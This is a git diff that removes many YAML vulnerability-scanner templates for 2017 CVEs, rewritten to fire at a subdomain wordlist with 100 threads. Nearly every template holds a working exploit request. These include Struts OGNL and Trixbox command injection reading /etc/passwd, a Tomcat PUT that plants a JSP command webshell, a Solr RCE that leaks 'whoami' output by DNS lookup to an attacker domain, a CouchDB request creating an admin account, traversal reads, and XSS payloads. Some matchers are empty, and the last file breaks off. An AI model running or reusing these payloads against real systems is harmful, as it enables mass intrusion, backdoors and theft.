diff --git a/tmp/cve/cve-2017-12542-2885.yaml b/tmp/cve/cve-2017-12542-2885.yaml
deleted file mode 100644
index e62dd73cbf..0000000000
--- a/tmp/cve/cve-2017-12542-2885.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2017-12542
-info:
- name: ILO4 Authentication bypass
- author: pikpikcu
- severity: critical
- description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
- reference: |
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- - https://www.exploit-db.com/exploits/44005
- tags: cve,cve2017,ilo4,hpe
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /rest/v1/AccountService/Accounts HTTP/1.1
- Host: {{Subdomains}}
- Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "iLO User"
- part: body
- - type: word
- words:
- - "application/json"
- part: header
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-12544-2889.yaml b/tmp/cve/cve-2017-12544-2889.yaml
deleted file mode 100644
index 8e24e0c4d5..0000000000
--- a/tmp/cve/cve-2017-12544-2889.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2017-12544
-info:
- name: HPE System Management - XSS
- author: divya_mudgal
- severity: medium
- description: Reflected Cross-site scripting (XSS) on HPE System Management
- reference:
- - https://seclists.org/fulldisclosure/2018/Mar/5
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 5.4
- cve-id: CVE-2017-12544
- cwe-id: CWE-79
- tags: cve,cve2017,xss,hp
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "var prodName = '';prompt`document.domain`;//';"
- part: body
- - type: word
- words:
- - "text/html"
- part: header
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-12611-2896.yaml b/tmp/cve/cve-2017-12611-2896.yaml
deleted file mode 100644
index 409d4eecea..0000000000
--- a/tmp/cve/cve-2017-12611-2896.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2017-12611
-info:
- name: Apache Struts2 S2-053 RCE
- author: pikpikcu
- severity: critical
- description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.
- reference: https://struts.apache.org/docs/s2-053.html
- tags: cve,cve2017,apache,rce,struts
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-12615-2902.yaml b/tmp/cve/cve-2017-12615-2902.yaml
deleted file mode 100644
index 5b54a97594..0000000000
--- a/tmp/cve/cve-2017-12615-2902.yaml
+++ /dev/null
@@ -1,55 +0,0 @@
-id: CVE-2017-12615
-info:
- name: Apache Tomcat RCE
- author: pikpikcu
- severity: critical
- tags: cve,cve2017,apache,rce
- reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
- description: |
- By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
- This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
- However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
- Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- PUT /poc.jsp/ HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
- Connection: close
- Content-Length: 82
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip, deflate
-
- <%@ page import="java.util.*,java.io.*"%>
- <%
- if (request.getParameter("cmd") != null) {
- out.println("Command: " + request.getParameter("cmd") + " ");
- Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
- OutputStream os = p.getOutputStream();
- InputStream in = p.getInputStream();
- DataInputStream dis = new DataInputStream(in);
- String disr = dis.readLine();
- while ( disr != null ) {
- out.println(disr);
- disr = dis.readLine();
- }
- }
- %>
- - |
- GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-12629-2910.yaml b/tmp/cve/cve-2017-12629-2910.yaml
deleted file mode 100644
index ee3de15347..0000000000
--- a/tmp/cve/cve-2017-12629-2910.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2017-12629
-info:
- name: Apache Solr <= 7.1 Remote Code Execution via SSRF
- author: dwisiswant0
- severity: critical
- tags: cve,cve2017,solr,apache,rce,ssrf,oob
- reference: |
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- - https://twitter.com/honoki/status/1298636315613974532/photo/1
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{Host}}.{{Port}}.{{Subdomains}}.2017.12629.{{MY-DOMAIN}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
- Host: {{Subdomains}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Accept-Language: en-US,en;q=0.9
- - |-
- GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
- Host: {{Subdomains}}
- Connection: close
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Accept-Language: en-US,en;q=0.9
diff --git a/tmp/cve/cve-2017-12635-2912.yaml b/tmp/cve/cve-2017-12635-2912.yaml
deleted file mode 100644
index 17fc6ad291..0000000000
--- a/tmp/cve/cve-2017-12635-2912.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: CVE-2017-12635
-info:
- name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation
- author: pikpikcu
- severity: high
- description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
- reference: https://github.com/assalielmehdi/CVE-2017-12635
- tags: cve,cve2017,couchdb
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- PUT /_users/org.couchdb.user:poc HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: application/json
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Length: 108
-
- {
- "type": "user",
- "name": "poc",
- "roles": ["_admin"],
- "roles": [],
- "password": "123456"
- }
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- - "Location:"
- part: header
- - type: word
- words:
- - "org.couchdb.user:poc"
- - "conflict"
- - "Document update conflict"
- part: body
- - type: status
- status:
- - 201
- - 409
diff --git a/tmp/cve/cve-2017-12637-2917.yaml b/tmp/cve/cve-2017-12637-2917.yaml
deleted file mode 100644
index 48d266ed75..0000000000
--- a/tmp/cve/cve-2017-12637-2917.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2017-12637
-info:
- name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5
- author: apt-mirror
- severity: high
- description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
- tags: cve,cve2017,sap,lfi
- reference: |
- - https://www.cvedetails.com/cve/CVE-2017-12637/
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "WEB-INF"
- - "META-INF"
- condition: and
- part: body
diff --git a/tmp/cve/cve-2017-12794-2922.yaml b/tmp/cve/cve-2017-12794-2922.yaml
deleted file mode 100644
index a67d74cb6a..0000000000
--- a/tmp/cve/cve-2017-12794-2922.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2017-12794
-info:
- name: Django debug page XSS
- author: pikpikcu
- severity: medium
- reference: |
- - https://twitter.com/sec715/status/1406779605055270914
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12794
- description: |
- In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings.
- tags: xss,django,cve,cve2017
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: status
- status:
- - 200
- - type: word
- words:
- - "text/html"
- part: header
diff --git a/tmp/cve/cve-2017-14535-2929.yaml b/tmp/cve/cve-2017-14535-2929.yaml
deleted file mode 100644
index 5459d9a522..0000000000
--- a/tmp/cve/cve-2017-14535-2929.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2017-14535
-info:
- name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
- author: pikpikcu
- severity: high
- reference: |
- - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- - https://www.exploit-db.com/exploits/49913
- tags: cve,cve2017,trixbox,rce
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: de,en-US;q=0.7,en;q=0.3
- Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
- Connection: close
- Cache-Control: max-age=0
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-14651-2938.yaml b/tmp/cve/cve-2017-14651-2938.yaml
deleted file mode 100644
index 1ea7083d81..0000000000
--- a/tmp/cve/cve-2017-14651-2938.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2017-14651
-info:
- name: Reflected XSS - WSO2 Data Analytics Server
- author: mass0ma
- severity: medium
- description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
- tags: cve,cve2017,wso2,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- - "Failed to add new collection"
- part: body
- condition: and
- - type: word
- words:
- - "text/html"
- part: header
diff --git a/tmp/cve/cve-2017-14849-2942.yaml b/tmp/cve/cve-2017-14849-2942.yaml
deleted file mode 100644
index 7282556119..0000000000
--- a/tmp/cve/cve-2017-14849-2942.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2017-14849
-info:
- name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
- author: Random_Robbie
- severity: high
- description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
- tags: cve,cve2017,nodejs,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /static/../../../a/../../../../etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:[x*]:0:0:"
- part: body
diff --git a/tmp/cve/cve-2017-15647-2954.yaml b/tmp/cve/cve-2017-15647-2954.yaml
deleted file mode 100644
index cb058513d7..0000000000
--- a/tmp/cve/cve-2017-15647-2954.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-15647
-info:
- name: FiberHome - Directory Traversal
- author: daffainfo
- severity: medium
- description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
- reference: |
- - https://www.exploit-db.com/exploits/44054
- - https://www.cvedetails.com/cve/CVE-2017-15647
- tags: cve,cve2017,lfi,router
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-15715-2959.yaml b/tmp/cve/cve-2017-15715-2959.yaml
deleted file mode 100644
index 814480f5a8..0000000000
--- a/tmp/cve/cve-2017-15715-2959.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: CVE-2017-15715
-info:
- name: Apache Arbitrary File Upload
- author: geeknik
- description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.
- reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
- severity: high
- tags: cve,cve2017,apache,httpd,fileupload
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST / HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 264
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
- Accept-Encoding: gzip, deflate
- Connection: close
-
- ------WebKitFormBoundaryKc8fBVDo558U4hbJ
- Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
-
- {{randstr_1}}
-
- ------WebKitFormBoundaryKc8fBVDo558U4hbJ
- Content-Disposition: form-data; name="name"
-
- {{randstr}}.php\x0A
- ------WebKitFormBoundaryKc8fBVDo558U4hbJ--
- - |
- GET /{{randstr}}.php\x0A HTTP/1.1
- Host: {{Subdomains}}
- Accept-Encoding: gzip,deflate
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- Connection: close
- matchers:
- - type: word
- words:
- - "{{randstr_1}}"
- part: body
diff --git a/tmp/cve/cve-2017-15944-2964.yaml b/tmp/cve/cve-2017-15944-2964.yaml
deleted file mode 100644
index 7b404fb535..0000000000
--- a/tmp/cve/cve-2017-15944-2964.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2017-15944
-info:
- name: PreAuth RCE on Palo Alto GlobalProtect
- author: emadshanab
- reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- severity: high
- tags: cve,cve2017,rce,vpn,paloalto
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /global-protect/portal/css/login.css HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
- part: header
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-16806-2968.yaml b/tmp/cve/cve-2017-16806-2968.yaml
deleted file mode 100644
index 0c9cf6ca54..0000000000
--- a/tmp/cve/cve-2017-16806-2968.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: CVE-2017-16806
-info:
- name: Ulterius Server < 1.9.5.0 - Directory Traversal
- author: geeknik
- reference: https://www.exploit-db.com/exploits/43141
- severity: high
- tags: cve,cve2017,ulterius,traversal
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:[x*]:0:0:"
- - "\\[(font|extension|file)s\\]"
- conditon: or
- part: body
diff --git a/tmp/cve/cve-2017-16806.yaml b/tmp/cve/cve-2017-16806.yaml
deleted file mode 100644
index 159b0732f8..0000000000
--- a/tmp/cve/cve-2017-16806.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2017-16806
-
-info:
- name: Ulterius Server < 1.9.5.0 - Directory Traversal
- author: geeknik
- reference: https://www.exploit-db.com/exploits/43141
- severity: high
- tags: cve,cve2017,ulterius,traversal
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:[x*]:0:0:"
- - "\\[(font|extension|file)s\\]"
- conditon: or
- part: body
diff --git a/tmp/cve/cve-2017-16877-2971.yaml b/tmp/cve/cve-2017-16877-2971.yaml
deleted file mode 100644
index 2e80d6056a..0000000000
--- a/tmp/cve/cve-2017-16877-2971.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2017-16877
-info:
- name: Nextjs v2.4.1 LFI
- author: pikpikcu
- severity: high
- description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
- reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
- tags: cve,cve2017,nextjs,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-17043-2976.yaml b/tmp/cve/cve-2017-17043-2976.yaml
deleted file mode 100644
index 411277dae0..0000000000
--- a/tmp/cve/cve-2017-17043-2976.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-17043
-info:
- name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
- tags: cve,cve2017,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-17059-2979.yaml b/tmp/cve/cve-2017-17059-2979.yaml
deleted file mode 100644
index e9c04a3852..0000000000
--- a/tmp/cve/cve-2017-17059-2979.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2017-17059
-info:
- name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
- reference: |
- - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
- tags: cve,cve2017,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1
- Host: {{Subdomains}}
-
- amty_hidden=1
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-17451-2982.yaml b/tmp/cve/cve-2017-17451-2982.yaml
deleted file mode 100644
index a7fb9d1f45..0000000000
--- a/tmp/cve/cve-2017-17451-2982.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2017-17451
-info:
- name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
- tags: cve,cve2017,wordpress,xss,wp-plugin
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2017-17562-2985.yaml b/tmp/cve/cve-2017-17562-2985.yaml
deleted file mode 100644
index cea10c141a..0000000000
--- a/tmp/cve/cve-2017-17562-2985.yaml
+++ /dev/null
@@ -1,97 +0,0 @@
-id: CVE-2017-17562
-info:
- name: Embedthis GoAhead RCE
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
- author: geeknik
- reference: |
- - https://www.elttam.com/blog/goahead/
- - https://github.com/ivanitlearning/CVE-2017-17562
- - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- severity: high
- tags: cve,cve2017,rce,embedthis,goahead,fuzz
-requests:
- - payloads:
- endpoint:
- - admin
- - apply
- - non-CA-rev
- - cgitest
- - checkCookie
- - check_user
- - chn/liveView
- - cht/liveView
- - cnswebserver
- - config
- - configure/set_link_neg
- - configure/swports_adjust
- - eng/liveView
- - firmware
- - getCheckCode
- - get_status
- - getmac
- - getparam
- - guest/Login
- - home
- - htmlmgr
- - index
- - index/login
- - jscript
- - kvm
- - liveView
- - login
- - login.asp
- - login/login
- - login/login-page
- - login_mgr
- - luci
- - main
- - main-cgi
- - manage/login
- - menu
- - mlogin
- - netbinary
- - nobody/Captcha
- - nobody/VerifyCode
- - normal_userLogin
- - otgw
- - page
- - rulectl
- - service
- - set_new_config
- - sl_webviewer
- - ssi
- - status
- - sysconf
- - systemutil
- - t/out
- - top
- - unauth
- - upload
- - variable
- - wanstatu
- - webcm
- - webmain
- - webproc
- - webscr
- - webviewLogin
- - webviewLogin_m64
- - webviewer
- - welcome
- raw:
- - |
- GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Accept: */*
- Connection: close
- attack: sniper
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "environment variable"
- - "display library search paths"
- condition: and
diff --git a/tmp/cve/cve-2017-17562-2986.yaml b/tmp/cve/cve-2017-17562-2986.yaml
deleted file mode 100644
index 906dd4a556..0000000000
--- a/tmp/cve/cve-2017-17562-2986.yaml
+++ /dev/null
@@ -1,104 +0,0 @@
-id: CVE-2017-17562
-info:
- name: Embedthis GoAhead <3.6.5 - Remote Code Execution
- author: geeknik
- severity: high
- description: |
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
- reference:
- - https://www.elttam.com/blog/goahead/
- - https://github.com/ivanitlearning/CVE-2017-17562
- - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- - https://github.com/embedthis/goahead/issues/249
- - https://nvd.nist.gov/vuln/detail/CVE-2017-17562
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.1
- cve-id: CVE-2017-17562
- cwe-id: CWE-20
- tags: cve,cve2017,rce,goahead,fuzz,kev
-requests:
- - raw:
- - |
- GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- payloads:
- endpoint:
- - admin
- - apply
- - non-CA-rev
- - cgitest
- - checkCookie
- - check_user
- - chn/liveView
- - cht/liveView
- - cnswebserver
- - config
- - configure/set_link_neg
- - configure/swports_adjust
- - eng/liveView
- - firmware
- - getCheckCode
- - get_status
- - getmac
- - getparam
